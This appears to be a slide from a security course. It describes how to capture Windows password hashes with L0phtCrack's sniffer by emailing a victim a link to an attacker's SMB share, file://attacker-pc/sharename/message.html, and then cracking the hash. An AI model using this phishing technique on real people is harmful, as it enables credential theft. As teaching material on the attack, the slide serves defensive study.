Using L0phtCrack’s Sniffer
¨make the password hash come to you for authentication
–Send email containing URL
•file://attacker-pc/sharename/message.html
–When victim clicks on URL, victim’s machine attempts to mount the share on attacker’s server using a challenge/handshake protocol
–Password hash is captured by attacker-pc  running L0phtcrack’s integrated sniffing tool
–Password hash is fed into L0phtcrack to retrieve user’s password
–
–
¨